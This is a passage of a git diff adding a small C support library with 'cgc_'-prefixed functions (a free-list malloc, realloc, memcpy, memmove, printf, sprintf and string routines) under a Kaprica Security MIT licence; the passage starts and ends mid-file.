SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_malloc.h" +#include "cgc_stdlib.h" + +/* Get some more memory through allocate */ +static int allocate_new_blk(void) +{ + void *ret; + struct blk_t *new_blk; + cgc_size_t size = NEW_CHUNK_SIZE; + + if (cgc_allocate(size, 0, &ret) != 0) { + return 1; + } + + if (ret == NULL) + return 1; + + new_blk = (struct blk_t *)ret; + new_blk->size = size; + new_blk->free = 1; + new_blk->fpred = NULL; + new_blk->fsucc = NULL; + new_blk->prev = NULL; + new_blk->next = NULL; + + cgc_insert_into_flist(new_blk); + return 0; +} + +/* Find first fit block for a size */ +static int find_fit(cgc_size_t size, struct blk_t **blk) +{ + int sc_i = cgc_get_size_class(size); + + for (; sc_i < NUM_FREE_LISTS; sc_i++) { + *blk = cgc_free_lists[sc_i]; + for(; *blk != NULL; *blk = (*blk)->fsucc) + if ((*blk)->size >= size) + return sc_i; + } + + *blk = NULL; + return -1; +} + +static void *malloc_huge(cgc_size_t size) +{ + void *mem; + size += HEADER_PADDING; + if (cgc_allocate(size, 0, &mem) != 0) + return NULL; + struct blk_t *blk = mem; + blk->size = size; + blk->free = 0; + blk->fpred = NULL; + blk->fsucc = NULL; + blk->prev = NULL; + blk->next = NULL; + return (void *)((intptr_t)blk + HEADER_PADDING); +} + +void *cgc_malloc(cgc_size_t size) +{ + if (size == 0) + return NULL; + + if (size + HEADER_PADDING >= NEW_CHUNK_SIZE) + return malloc_huge(size); + + if (size % ALIGNMENT != 0) + size = (size + ALIGNMENT - 1) & ~(ALIGNMENT - 1); + + if (size >= 0x80000000) + return NULL; + size += HEADER_PADDING; + + struct blk_t *blk = NULL; + int sc_i = find_fit(size, &blk); + + /* Allocate a new block if no fit */ + if (blk == NULL) { + if (allocate_new_blk() != 0) { + return NULL; + } else { + sc_i = NUM_FREE_LISTS - 1; + blk = cgc_free_lists[sc_i]; + } + } + + /* Remove the block we're going to use from the free list */ + cgc_remove_from_flist(blk); + + /* Split the block into two pieces if possible */ + cgc_size_t sdiff = blk->size - size; + if (sdiff > 2 * HEADER_PADDING) { + struct blk_t *nb = (struct blk_t *)((intptr_t)blk + size); + + nb->size = sdiff; + nb->free = 1; + nb->fsucc = NULL; + nb->fpred = NULL; + + blk->size = size; + + /* Patch up blk list pointers */ + nb->prev = blk; + nb->next = blk->next; + if (blk->next) + blk->next->prev = nb; + blk->next = nb; + + /* Put the new block into the free list */ + cgc_insert_into_flist(nb); + } + + return (void *)((intptr_t)blk + HEADER_PADDING); +} diff --git a/exclude/FUN/lib/malloc_common.c b/exclude/FUN/lib/malloc_common.c new file mode 100644 index 000000000..6fdfc7e6a --- /dev/null +++ b/exclude/FUN/lib/malloc_common.c @@ -0,0 +1,127 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_malloc.h" +#include "cgc_stdlib.h" + +cgc_size_t size_class_limits[NUM_FREE_LISTS] = { + 2, 3, 4, 8, + 16, 24, 32, 48, + 64, 96, 128, 192, + 256, 384, 512, 768, + 1024, 1536, 2048, 3072, + 4096, 6144, 8192, 12288, + 16384, 24576, 32768, 49152, + 65536, 98304, 131072, INT32_MAX +}; + +struct blk_t *cgc_free_lists[NUM_FREE_LISTS] = {0}; + +static void remove_from_blist(struct blk_t *blk) +{ + if (blk->prev) + blk->prev->next = blk->next; + + if (blk->next) + blk->next->prev = blk->prev; +} + +int cgc_get_size_class(cgc_size_t size) +{ + int i; + for (i = 0; i < NUM_FREE_LISTS && size > size_class_limits[i]; i++); + return i; +} + + +void cgc_insert_into_flist(struct blk_t *blk) +{ + int sc_i = cgc_get_size_class(blk->size); + blk->free = 1; + + if (cgc_free_lists[sc_i] == NULL) { + cgc_free_lists[sc_i] = blk; + return; + } + + blk->fsucc = cgc_free_lists[sc_i]; + cgc_free_lists[sc_i]->fpred = blk; + cgc_free_lists[sc_i] = blk; + blk->fpred = NULL; +} + +void cgc_remove_from_flist(struct blk_t *blk) +{ + int sc_i = cgc_get_size_class(blk->size); + + if (blk->fpred) + blk->fpred->fsucc = blk->fsucc; + + if (blk->fsucc) + blk->fsucc->fpred = blk->fpred; + + if (cgc_free_lists[sc_i] == blk) + cgc_free_lists[sc_i] = blk->fsucc; + + blk->fsucc = NULL; + blk->fpred = NULL; + blk->free = 0; +} + +void cgc_coalesce(struct blk_t *blk) +{ + /* prev and next are free */ + if (blk->prev && blk->prev->free && blk->next && blk->next->free) { + cgc_remove_from_flist(blk->prev); + cgc_remove_from_flist(blk->next); + cgc_remove_from_flist(blk); + + blk->prev->size += blk->size; + blk->prev->size += blk->next->size; + cgc_insert_into_flist(blk->prev); + + remove_from_blist(blk->next); + remove_from_blist(blk); + /* Just prev is free */ + } else if (blk->prev && blk->prev->free && blk->next && !blk->next->free) { + cgc_remove_from_flist(blk->prev); + cgc_remove_from_flist(blk); + + blk->prev->size += blk->size; + cgc_insert_into_flist(blk->prev); + + remove_from_blist(blk); + /* Just next is free */ + } else if (blk->prev && !blk->prev->free && blk->next && blk->next->free) { + cgc_remove_from_flist(blk->next); + cgc_remove_from_flist(blk); + + blk->size += blk->next->size; + cgc_insert_into_flist(blk); + + remove_from_blist(blk->next); + } +} diff --git a/exclude/FUN/lib/memchr.c b/exclude/FUN/lib/memchr.c new file mode 100644 index 000000000..2764e25e1 --- /dev/null +++ b/exclude/FUN/lib/memchr.c @@ -0,0 +1,39 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_stdint.h" + +extern void *cgc_memchr(const void *s, int c, cgc_size_t n) +{ + cgc_size_t i = 0; + while (i < n) { + if (*((uint8_t *)s + i) == c) + return (void *)((intptr_t)s + i); + + i++; + } + return NULL; +} diff --git a/exclude/FUN/lib/memcmp.c b/exclude/FUN/lib/memcmp.c new file mode 100644 index 000000000..f00e5802d --- /dev/null +++ b/exclude/FUN/lib/memcmp.c @@ -0,0 +1,36 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include "libcgc.h" + +int cgc_memcmp(const char *s1, const char *s2, cgc_size_t n) +{ + cgc_size_t i; + for(i = 0; i < n; i++) + if (*s1 != *s2) + return *s1 - *s2; + else + s1++, s2++; + return 0; +} diff --git a/exclude/FUN/lib/memcpy.c b/exclude/FUN/lib/memcpy.c new file mode 100755 index 000000000..3c311d6d4 --- /dev/null +++ b/exclude/FUN/lib/memcpy.c @@ -0,0 +1,38 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "cgc_string.h" + +void *cgc_memcpy(void *dest, const void *src, cgc_size_t n) +{ + unsigned char *d = (unsigned char *)dest, *s = (unsigned char *)src; + cgc_size_t i = 0; + while (i < n) { + d[i] = s[i]; + i++; + } + + return dest; +} diff --git a/exclude/FUN/lib/memmove.c b/exclude/FUN/lib/memmove.c new file mode 100644 index 000000000..ec0269ced --- /dev/null +++ b/exclude/FUN/lib/memmove.c @@ -0,0 +1,45 @@ +/* + * Author: Andrew Wesie + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include "cgc_string.h" + +void *cgc_memmove(void *dest, const void *src, cgc_size_t n) +{ + cgc_size_t i; + const unsigned char *usrc = src; + unsigned char *udest = dest; + + if (udest < usrc) + { + for (i = 0; i < n; i++) + udest[i] = usrc[i]; + } + else if (udest > usrc) + { + for (i = n; i > 0; i--) + udest[i-1] = usrc[i-1]; + } + + return dest; +} diff --git a/exclude/FUN/lib/memset.c b/exclude/FUN/lib/memset.c new file mode 100755 index 000000000..2c38b2a14 --- /dev/null +++ b/exclude/FUN/lib/memset.c @@ -0,0 +1,42 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" + +void *cgc_memset(void *s, int c, cgc_size_t n) +{ + if (s == NULL) + return NULL; + + if (n == 0) + return s; + + unsigned char *p = s; + cgc_size_t i; + for(i = 0; i < n; i++) + *p++ = (unsigned char) c; + + return s; +} diff --git a/exclude/FUN/lib/printf.c b/exclude/FUN/lib/printf.c new file mode 100644 index 000000000..c9c88e557 --- /dev/null +++ b/exclude/FUN/lib/printf.c @@ -0,0 +1,261 @@ +/* + * Author: Andrew Wesie + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include "cgc_stdlib.h" +#include "cgc_stdarg.h" +#include "cgc_string.h" + +#define OUTPUT_BYTE(x) do { \ + cgc_size_t bytes; \ + char _c = x; \ + cgc_transmit(fd, &_c, sizeof(_c), &bytes); \ +} while (0); + +#define NUM_TO_LOWER(x) (((x) < 10 ? (x)+'0' : (x)-10+'a')) +#define NUM_TO_UPPER(x) (((x) < 10 ? (x)+'0' : (x)-10+'A')) + +#define FLAG_PAD_ZERO 0x1 +#define FLAG_UPPERCASE 0x2 +int cgc_output_number_printf(int fd, unsigned int x, int base, int min, unsigned int flags) +{ + int n = 0; + if (x >= base) + { + n = cgc_output_number_printf(fd, x / base, base, min-1, flags); + x %= base; + } + if (n == 0 && min > 0) + { + while (--min) + if (flags & FLAG_PAD_ZERO) + OUTPUT_BYTE('0') + else + OUTPUT_BYTE(' ') + } + + if (flags & FLAG_UPPERCASE) + OUTPUT_BYTE(NUM_TO_UPPER(x)) + else + OUTPUT_BYTE(NUM_TO_LOWER(x)) + return n + 1; +} + +int cgc_fdprintf(int fd, const char *fmt, ...) +{ + char *astring; + char achar; + int aint, i, n = 0, flags = 0, min = 0; + unsigned int auint; + va_list ap; + va_start(ap, fmt); + + while (*fmt != '\0') + { + char c = *fmt++; + if (c == '%') + { + while (1) + { + c = *fmt++; + switch (c) + { + case '0': + flags |= FLAG_PAD_ZERO; + continue; + case '1': + case '2': + case '3': + case '4': + case '5': + case '6': + case '7': + case '8': + case '9': + min = cgc_strtol(fmt-1, (char**)&fmt, 10); + continue; + } + break; + } + switch (c) + { + case '%': + OUTPUT_BYTE('%') + break; + case 's': + astring = va_arg(ap, char *); + for (i = 0; i < cgc_strlen(astring); i++) + OUTPUT_BYTE(astring[i]); + break; + case 'd': + aint = va_arg(ap, int); + if (aint < 0) + { + OUTPUT_BYTE('-') + aint = -aint; + } + cgc_output_number_printf(fd, aint, 10, min, flags); + break; + case 'u': + auint = va_arg(ap, unsigned int); + cgc_output_number_printf(fd, auint, 10, min, flags); + break; + case 'X': + flags |= FLAG_UPPERCASE; + case 'x': + auint = va_arg(ap, unsigned int); + cgc_output_number_printf(fd, auint, 16, min, flags); + break; + case 'c': + achar = (signed char) va_arg(ap, int); + OUTPUT_BYTE(achar); + break; + default: + OUTPUT_BYTE(c) + break; + } + min = 0; + flags = 0; + } + else + { + OUTPUT_BYTE(c) + } + } + + va_end(ap); + return n; +} + +#undef OUTPUT_BYTE + +#define OUTPUT_BYTE(n, s, x) do { \ + cgc_size_t bytes; \ + char _c = x; \ + *(*(s)) = _c; \ + (*(s))++; \ + (*(n))++; \ +} while (0); + +int cgc_output_number_sprintf(int *n, char **s, unsigned int x, int base, int min, unsigned int flags) +{ + int m = 0; + if (x >= base) + { + m = cgc_output_number_sprintf(n, s, x / base, base, min-1, flags); + x %= base; + } + if (m == 0 && min > 0) + { + while (--min) + if (flags & FLAG_PAD_ZERO) + OUTPUT_BYTE(n, s, '0') + else + OUTPUT_BYTE(n, s, ' ') + } + + if (flags & FLAG_UPPERCASE) + OUTPUT_BYTE(n, s, NUM_TO_UPPER(x)) + else + OUTPUT_BYTE(n, s, NUM_TO_LOWER(x)) + return m + 1; +} + +int cgc_sprintf(char *str, const char *fmt, ...) +{ + char *astring; + int aint, i, n = 0, flags = 0, min = 0; + unsigned int auint; + va_list ap; + va_start(ap, fmt); + + while (*fmt != '\0') + { + char c = *fmt++; + if (c == '%') + { + while (1) + { + c = *fmt++; + switch (c) + { + case '0': + flags |= FLAG_PAD_ZERO; + continue; + case '1': + case '2': + case '3': + case '4': + case '5': + case '6': + case '7': + case '8': + case '9': + min = cgc_strtol(fmt-1, (char**)&fmt, 10); + continue; + } + break; + } + switch (c) + { + case '%': + OUTPUT_BYTE(&n, &str, '%') + break; + case 's': + astring = va_arg(ap, char *); + for (i = 0; i < cgc_strlen(astring); i++) + OUTPUT_BYTE(&n, &str, astring[i]); + break; + case 'd': + aint = va_arg(ap, int); + if (aint < 0) + { + OUTPUT_BYTE(&n, &str, '-') + aint = -aint; + } + cgc_output_number_sprintf(&n, &str, aint, 10, min, flags); + break; + case 'X': + flags |= FLAG_UPPERCASE; + case 'x': + auint = va_arg(ap, unsigned int); + cgc_output_number_sprintf(&n, &str, auint, 16, min, flags); + break; + default: + OUTPUT_BYTE(&n, &str, c) + break; + } + min = 0; + flags = 0; + } + else + { + OUTPUT_BYTE(&n, &str, c) + } + } + *str++ = 0; + + va_end(ap); + return n; +} + diff --git a/exclude/FUN/lib/realloc.c b/exclude/FUN/lib/realloc.c new file mode 100644 index 000000000..8ae2029b3 --- /dev/null +++ b/exclude/FUN/lib/realloc.c @@ -0,0 +1,55 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_malloc.h" +#include "cgc_stdlib.h" +#include "cgc_stdint.h" +#include "cgc_string.h" + +void *cgc_realloc(void *ptr, cgc_size_t size) +{ + if (ptr == NULL) + return cgc_malloc(size); + + if (size == 0) { + cgc_free(ptr); + return NULL; + } + + void *new = cgc_malloc(size); + if (new == NULL) + return NULL; + + struct blk_t *blk = (struct blk_t *)((intptr_t)ptr - HEADER_PADDING); + + if (size < blk->size - HEADER_PADDING) + cgc_memcpy(new, ptr, size); + else + cgc_memcpy(new, ptr, blk->size - HEADER_PADDING); + + cgc_free(ptr); + return new; +} diff --git a/exclude/FUN/lib/strcasecmp.c b/exclude/FUN/lib/strcasecmp.c new file mode 100644 index 000000000..c4618b4f7 --- /dev/null +++ b/exclude/FUN/lib/strcasecmp.c @@ -0,0 +1,39 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "cgc_ctype.h" + +int cgc_strcasecmp(const char *s1, const char *s2) +{ + unsigned char *_s1 = (unsigned char *)s1; + unsigned char *_s2 = (unsigned char *)s2; + while (*_s1 && *_s2) + if (!(*_s1 == *_s2 || cgc_tolower(*_s1) == cgc_tolower(*_s2))) + break; + else + _s1++, _s2++; + + return cgc_tolower(*_s1) - cgc_tolower(*_s2); +} diff --git a/exclude/FUN/lib/strcat.c b/exclude/FUN/lib/strcat.c new file mode 100644 index 000000000..b5cef01d2 --- /dev/null +++ b/exclude/FUN/lib/strcat.c @@ -0,0 +1,32 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "cgc_string.h" + +char *cgc_strcat(char *dest, const char *src) +{ + cgc_strcpy(dest + cgc_strlen(dest), src); + return dest; +} diff --git a/exclude/FUN/lib/strchr.c b/exclude/FUN/lib/strchr.c new file mode 100644 index 000000000..f1a507660 --- /dev/null +++ b/exclude/FUN/lib/strchr.c @@ -0,0 +1,43 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" + +char *cgc_strchr(const char *s, int c) +{ + const char *p = s; + + while (*p) + { + if (*p == c) + return (char *) p; + p++; + } + + if (c == (int)NULL) + return (char *)p; + + return NULL; +} diff --git a/exclude/FUN/lib/strcmp.c b/exclude/FUN/lib/strcmp.c new file mode 100644 index 000000000..47fe732f3 --- /dev/null +++ b/exclude/FUN/lib/strcmp.c @@ -0,0 +1,37 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" + +int cgc_strcmp(const char *s1, const char *s2) +{ + while (*s1 && *s2) + if (*s1 != *s2) + break; + else + s1++, s2++; + + return *s1 - *s2; +} diff --git a/exclude/FUN/lib/strcpy.c b/exclude/FUN/lib/strcpy.c new file mode 100644 index 000000000..ef02810a3 --- /dev/null +++ b/exclude/FUN/lib/strcpy.c @@ -0,0 +1,36 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "cgc_string.h" + +char *cgc_strcpy(char *dest, const char *src) +{ + cgc_size_t i = 0; + while (*src) + dest[i++] = *src++; + + dest[i] = '\0'; + return dest; +} diff --git a/exclude/FUN/lib/strdup.c b/exclude/FUN/lib/strdup.c new file mode 100644 index 000000000..948d8a048 --- /dev/null +++ b/exclude/FUN/lib/strdup.c @@ -0,0 +1,12 @@ +#include "cgc_stdlib.h" +#include "cgc_string.h" + +char 